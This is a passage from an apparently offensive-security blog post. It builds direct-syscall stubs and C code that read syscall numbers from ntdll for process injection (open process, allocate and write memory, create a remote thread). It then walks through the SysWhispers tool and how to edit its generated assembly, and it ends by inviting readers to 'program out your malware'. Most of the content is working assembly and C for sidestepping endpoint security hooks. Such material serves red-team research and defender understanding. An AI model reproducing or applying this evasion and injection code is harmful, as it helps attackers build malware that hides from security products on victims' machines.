		syscall                        
		ret                             
NtAllocateVirtualMemory endp

NtWriteVirtualMemory proc
		mov r10, rcx
		mov eax, NtWriteVirtualMemorySSN      
		syscall                        
		ret                             
NtWriteVirtualMemory endp

NtCreateThreadEx proc
		mov r10, rcx
		mov eax, NtCreateThreadExSSN      
		syscall                        
		ret                             
NtCreateThreadEx endp

NtWaitForSingleObject proc
		mov r10, rcx
		mov eax, NtWaitForSingleObjectSSN      
		syscall                        
		ret                             
NtWaitForSingleObject endp

NtClose proc
		mov r10, rcx
		mov eax, NtCloseSSN      
		syscall                        
		ret                             
NtClose endp
end

Our header file remains the same but in our main program, we need to do a bit of additional setup:

#include "glassBox.h"

DWORD NtCloseSSN; 
DWORD NtOpenProcessSSN; 
DWORD NtCreateThreadExSSN;
DWORD NtWriteVirtualMemorySSN;
DWORD NtWaitForSingleObjectSSN; 
DWORD NtAllocateVirtualMemorySSN;

/*-----------[SEEK SYSCALLS]-----------*/
DWORD GetSSN(IN HMODULE hNTDLL, IN LPCSTR NtFunction) {

    DWORD NtFunctionSSN = 0;
    UINT_PTR NtFunctionAddress = 0;

    info("trying to get the address of %s...", NtFunction);
    NtFunctionAddress = (UINT_PTR)GetProcAddress(hNTDLL, NtFunction);

    if (NtFunctionAddress == 0) {
        warn("failed to get the address of %s", NtFunction);
        return 0;
    }

    okay("got the address of %s!", NtFunction);
    info("getting SSN of %s...", NtFunction);
    /* stub layout: mov r10, rcx (3 bytes), then mov eax, imm32 (B8 + 4 bytes).
       the imm32 starting at +0x4 is the SSN, so read all 4 bytes instead of just the first one */
    NtFunctionSSN = *(PDWORD)(NtFunctionAddress + 4);
    okay("\\___[\n\t| %s\n\t| 0x%p+0x4\n\t|____________________0x%lx]\n", NtFunction, (PVOID)NtFunctionAddress, NtFunctionSSN);
    return NtFunctionSSN;

}

int main(void) {

    /*--------[GET SYSCALLS]--------*/
    hNTDLL = getMod(L"NTDLL");
    if (hNTDLL == NULL) {
        /* no module handle means no SSNs, so bail out early */
        return EXIT_FAILURE;
    }

    NtOpenProcessSSN = GetSSN(hNTDLL, "NtOpenProcess");
    NtAllocateVirtualMemorySSN = GetSSN(hNTDLL, "NtAllocateVirtualMemory");
    NtWriteVirtualMemorySSN = GetSSN(hNTDLL, "NtWriteVirtualMemory");
    NtCreateThreadExSSN = GetSSN(hNTDLL, "NtCreateThreadEx");
    NtWaitForSingleObjectSSN = GetSSN(hNTDLL, "NtWaitForSingleObject");
    NtCloseSSN = GetSSN(hNTDLL, "NtClose");

    return EXIT_SUCCESS;
}

The getMod function that you see in the line hNTDLL = getMod(L"NTDLL"); is another function I made for getting handles to modules (covered in the full NTAPI blog). It's nothing special, but it's a nice little QoL time saver:

HMODULE getMod(IN LPCWSTR modName) {

    HMODULE hModule = NULL;
    info("trying to get a handle to %S", modName);

    hModule = GetModuleHandleW(modName);

    if (hModule == NULL) {
        warn("failed to get a handle to the module, error: 0x%lx\n", GetLastError());
        return NULL;
    }

    else {
        okay("got a handle to the module!");
        info("\\___[ %S\n\t\\_0x%p]\n", modName, hModule);
        return hModule;
    }

}

That brings us to the final code for this blog post. Without further ado, here's the direct syscalls injection with dynamic SSN retrieval:

SysWhispers

No doubt, if you've spent any amount of time researching or participating in the development of malware, you've probably come across a tool (or versions of this tool) called "syswhispers". It's not without reason, after all. You know how we've created a syscalls.asm file with all of our syscall stubs in it, the function prototypes in our glassBox.h header file, etc.? Well, here comes syswhispers to do all that heavy lifting for you. All you have to do is supply the version of Windows you'd like to target, and the function names that you want the assembly stubs for, and you're done!

It's important to note that syswhispers comes in multiple versions, each version bringing something new to the table. For instance, a caveat of the first version of syswhispers is that it only goes up to Windows 10 21H1. It also lacks features that its more updated versions (syswhispers2 and syswhispers3) include, so it's worth looking around and experimenting.

We start by cloning the repo, which you can find here:

If we run this without any arguments, we can see the following:

We can see that there are some presets we can use like: all to get all the syscalls possible or the most "common" ones with the common preset. We'll manually define ours because the output can get really large. We'll supply the following to the script:

C:\tools\SysWhispers-master\SysWhispers-master>python syswhispers.py -f NtOpenProcess,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtWaitForSingleObject,NtClose -v 10 -o syscalls

  ,         ,       ,_ /_   .  ,   ,_    _   ,_   ,
_/_)__(_/__/_)__/_/_/ / (__/__/_)__/_)__(/__/ (__/_)__
      _/_                         /
     (/                          /   @Jackson_T, 2019

SysWhispers: Why call the kernel when you can whisper?

Complete! Files written to:
        syscalls.asm
        syscalls.h

We can see that the script generates two files for us! If we look at the generated files, starting with the assembly file, we can see the core logic behind what SysWhispers is doing:

.code

NtOpenProcess PROC
	mov rax, gs:[60h]                   ; Load PEB into RAX.
NtOpenProcess_Check_X_X_XXXX:               ; Check major version.
	cmp dword ptr [rax+118h], 10
	je  NtOpenProcess_Check_10_0_XXXX
	jmp NtOpenProcess_SystemCall_Unknown
NtOpenProcess_Check_10_0_XXXX:              ; Check build number for Windows 10.
	[...]
	cmp word ptr [rax+120h], 19042
	je NtOpenProcess_SystemCall_10_0_19042
	cmp word ptr [rax+120h], 19043
	je NtOpenProcess_SystemCall_10_0_19043
	jmp NtOpenProcess_SystemCall_Unknown   
	[...]
NtOpenProcess_SystemCall_10_0_19042:        ; Windows 10.0.19042 (20H2)
	mov eax, 0026h
	jmp NtOpenProcess_Epilogue
NtOpenProcess_SystemCall_10_0_19043:        ; Windows 10.0.19043 (21H1)
	mov eax, 0026h
	jmp NtOpenProcess_Epilogue
NtOpenProcess_SystemCall_Unknown:           ; Unknown/unsupported version.
	ret
NtOpenProcess_Epilogue:
	mov r10, rcx
	syscall
	ret
NtOpenProcess ENDP

	[...]

The assembly code starts off by loading the address of the Process Environment Block (PEB) into the RAX register. It does this because the PEB structure holds the major Windows version and the build number in its OSMajorVersion (offset 0x118) and OSBuildNumber (offset 0x120) members:

0:000> dt _PEB @$PEB
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   [...]
   +0x108 GdiDCAttributeList : 0
   +0x10c Padding3         : [4]  ""
   +0x110 LoaderLock       : 0x00007ffa`330165c8 _RTL_CRITICAL_SECTION
   +0x118 OSMajorVersion   : 0xa    ; 10    (Windows 10)
   +0x11c OSMinorVersion   : 0
   +0x120 OSBuildNumber    : 0x4a65 ; 19045 (Build 19045)
   +0x122 OSCSDVersion     : 0
   +0x124 OSPlatformId     : 2
   [...]
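If it helps to see those two cmp operands as C, here's a rough sketch that reads the same fields out of a mock buffer rather than a real PEB. The function names and the mock buffer are made up for illustration; only the offsets (0x118, 0x120) and field widths (dword, word) come from the assembly and the dt output above. It also assumes a little-endian host, which is what x64 gives us anyway.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* offsets taken from the x64 _PEB layout shown in the dt output */
#define PEB_OS_MAJOR_VERSION 0x118u /* dword, matches: cmp dword ptr [rax+118h], 10 */
#define PEB_OS_BUILD_NUMBER  0x120u /* word,  matches: cmp word ptr [rax+120h], ... */

/* Hypothetical helpers: "peb" is just a byte buffer standing in for the PEB. */
uint32_t peb_major_version(const uint8_t *peb) {
    uint32_t value;
    assert(peb != NULL);
    /* memcpy keeps the read well-defined regardless of the buffer's alignment */
    memcpy(&value, peb + PEB_OS_MAJOR_VERSION, sizeof value);
    return value;
}

uint16_t peb_build_number(const uint8_t *peb) {
    uint16_t value;
    assert(peb != NULL);
    memcpy(&value, peb + PEB_OS_BUILD_NUMBER, sizeof value);
    return value;
}
```

With a zeroed 0x130-byte buffer that has 0x0A written at 0x118 and the bytes 65 4A written at 0x120, these return 10 and 19045 (0x4a65), which is exactly what WinDbg showed us.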

So, we can see from the check below that if the Windows major version isn't 10, it will jmp to NtOpenProcess_SystemCall_Unknown, which contains just a single ret instruction. If the version is 10, the function goes on to determine which build it's running on so that it can use the appropriate SSN. Remember, this is necessary because syscall numbers can change from build to build, and almost definitely from major version to major version.

NtOpenProcess_Check_X_X_XXXX:               ; Check major version. (checking to see if we're on Windows 10 or not)
	cmp dword ptr [rax+118h], 10         
	je  NtOpenProcess_Check_10_0_XXXX   
	jmp NtOpenProcess_SystemCall_Unknown ; if it doesn't detect win 10 it performs an unconditional jmp to NtOpenProcess_SystemCall_Unknown which will just return.

After this version-checking snippet comes the build-verifying/enumerating portion of the code:

NtOpenProcess_Check_10_0_XXXX:              ; Check build number for Windows 10.
	cmp word ptr [rax+120h], 10240
	je  NtOpenProcess_SystemCall_10_0_10240
	cmp word ptr [rax+120h], 10586
	je  NtOpenProcess_SystemCall_10_0_10586
	cmp word ptr [rax+120h], 14393
	je  NtOpenProcess_SystemCall_10_0_14393
	cmp word ptr [rax+120h], 15063
	je  NtOpenProcess_SystemCall_10_0_15063
	cmp word ptr [rax+120h], 16299
	je  NtOpenProcess_SystemCall_10_0_16299
	cmp word ptr [rax+120h], 17134
	je  NtOpenProcess_SystemCall_10_0_17134
	cmp word ptr [rax+120h], 17763
	je  NtOpenProcess_SystemCall_10_0_17763
	cmp word ptr [rax+120h], 18362
	je  NtOpenProcess_SystemCall_10_0_18362
	cmp word ptr [rax+120h], 18363
	je  NtOpenProcess_SystemCall_10_0_18363
	cmp word ptr [rax+120h], 19041
	je  NtOpenProcess_SystemCall_10_0_19041
	cmp word ptr [rax+120h], 19042
	je  NtOpenProcess_SystemCall_10_0_19042
	cmp word ptr [rax+120h], 19043
	je  NtOpenProcess_SystemCall_10_0_19043
	jmp NtOpenProcess_SystemCall_Unknown
	[...]

Depending on which build number the program finds, it jumps to the corresponding section to populate the eax register with the build-specific syscall number. For example, if we were on 19043, it would land here:

NtOpenProcess_SystemCall_10_0_19043:        ; Windows 10.0.19043 (21H1)
	mov eax, 0026h
	jmp NtOpenProcess_Epilogue

Once that's been done, it'll jump to the syscall epilogue where our syscall is actually executed before returning:

NtOpenProcess_Epilogue:
	mov r10, rcx
	syscall
	ret
NtOpenProcess ENDP

It rinses and repeats for all the functions that we've generated the code for and that's how SysWhispers (version 1) works! A slight issue you might've noticed (or already know because it was in a callout earlier) is that our build version (19045) isn't there with all the other cool cats. Since we know the core logic behind this program and how it generates files for us and the contents therein, we can simply add our own build to the long list of builds present.

Obviously, manually adding in our own syscalls for every function we've generated using this tool kind of goes against the whole point of the tool, since it was created to do all of this for us. However, we're only doing this as a PoC to get a crystal clear understanding of the tool and its inner workings.

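If you try to incorporate these files and your build version isn't accounted for in the .asm file, then nothing will happen upon execution: none of the comparisons in NtOpenProcess_Check_10_0_XXXX match, so execution falls through to the unconditional jmp NtOpenProcess_SystemCall_Unknown and the stub just rets without ever executing syscall. Whatever was left in RAX (the PEB address loaded at the top of the stub) comes back as the "return value", so don't expect a meaningful NTSTATUS either. When I first started, this got me and it made me waste a lot of time, so just keep that in mind!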
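Stripped of the assembly, the generated stub is really just a lookup table with a silent failure path. Here's a small sketch of that logic. The names (build_ssn, lookup_ssn, nt_open_process_table) are made up for illustration, and the table only holds the two NtOpenProcess entries visible in the trimmed listing above; the real generated file covers more builds.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* one row per "cmp word ptr [rax+120h], BUILD / je ..." pair in the stub */
typedef struct {
    uint16_t build;
    uint32_t ssn;
} build_ssn;

/* NtOpenProcess entries as they appear in the generated syscalls.asm */
static const build_ssn nt_open_process_table[] = {
    { 19042, 0x26 }, /* Windows 10 20H2 */
    { 19043, 0x26 }, /* Windows 10 21H1 */
};

/* Returns 1 and fills *ssn_out on a match. Returns 0 otherwise, which is the
 * C equivalent of landing on the *_SystemCall_Unknown label and hitting ret. */
int lookup_ssn(const build_ssn *table, size_t count,
               uint32_t major, uint16_t build, uint32_t *ssn_out) {
    assert(table != NULL && ssn_out != NULL);

    if (major != 10) {
        return 0; /* major version check failed */
    }

    for (size_t i = 0; i < count; i++) {
        if (table[i].build == build) {
            *ssn_out = table[i].ssn;
            return 1;
        }
    }

    return 0; /* build not in the list: no SSN, no syscall */
}
```

Looking up build 19043 succeeds with 0x26, while build 19045 returns 0 because it simply isn't in the table. That second case is the trap described above: the lookup fails quietly, and nothing tells you why.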

I've butchered and added the following lines so that our build would be included - as well as the syscall numbers we've dumped from earlier:

.code

NtOpenProcess PROC
	mov rax, gs:[60h]                    ; Load PEB into RAX. PEB x64 @ gs:[60h], PEB x32 @ fs:[30h]
NtOpenProcess_Check_X_X_XXXX:                ; PEB->OSMajorVersion
	cmp dword ptr [rax+118h], 10           
	je  NtOpenProcess_Check_10_0_XXXX       
	jmp NtOpenProcess_SystemCall_Unknown ; if not Windows 10, jmp NtOpenProcess_SystemCall_Unknown
NtOpenProcess_Check_10_0_XXXX:               ; PEB->OSBuildNumber
	cmp word ptr [rax+120h], 19045          
	je  NtOpenProcess_SystemCall_10_0_19045
	jmp NtOpenProcess_SystemCall_Unknown ; if not build 19045, jmp NtOpenProcess_SystemCall_Unknown
NtOpenProcess_SystemCall_10_0_19045:         ; Windows 10.0.19045 (22H2) added by ~~headass~~ crow
	mov eax, 0026h
	jmp NtOpenProcess_Epilogue              
NtOpenProcess_SystemCall_Unknown:            ; Unknown/unsupported version.
	ret
NtOpenProcess_Epilogue:
	mov r10, rcx
	syscall                              ; can be replaced w/ legacy int 2eh as well
	ret
NtOpenProcess ENDP

Now, we just rinse and repeat for all of the functions (you really don't have to do this, you could just add in your build without removing them all - but for the sake of space, I'll be doing it this way). Eventually, you'll have a file that looks something like this:

syswhispers.asm

I've left the syswhispers.h header file intact because, aside from adding in our macros for printing, the NTSTATUS STATUS_SUCCESS, etc., it's pretty much the same as our glassBox.h header file. It even defines the InitializeObjectAttributes macro for initializing the _OBJECT_ATTRIBUTES structure:

#ifndef InitializeObjectAttributes
#define InitializeObjectAttributes( p, n, a, r, s ) { \
	(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
	(p)->RootDirectory = r;                           \
	(p)->Attributes = a;                              \
	(p)->ObjectName = n;                              \
	(p)->SecurityDescriptor = s;                      \
	(p)->SecurityQualityOfService = NULL;             \
}
#endif

Also, instead of using the extern keyword for the function prototypes, the header uses EXTERN_C, which expands to plain extern when compiled as C (and to extern "C" when compiled as C++), so for our purposes it's the same thing:

With this finally done, we can at last add these two files to our project. Once you've created a project, drag and drop the generated .asm and .h files into the directory where your project is:

We can add these files to our project now:

After pressing Add, you'll see it in your solution explorer pane. Next up, the header file. Same thing as before except we right-click on Header Files and choose the syscalls.h file:

Once that's finally added, we can enable MASM for our project like we did in the assembly portion section. Right-click your project and go to Build Dependencies > Build Customizations. Once the new window pops up, enable masm. After this, right-click on your syscalls.asm file and head to Properties:

With that done, you're golden! You can now add a new source file and program out your malware.

I hope you can see why I waited until the last moment to show this tool off. I'm a firm believer in at least manually doing something a couple of times before relying on a tool to do it for you - since that way, you understand what's going on under the hood and can troubleshoot much easier should something break or go wrong. Either way, this blog has been going on for long enough - till next time, see ya later (nerd).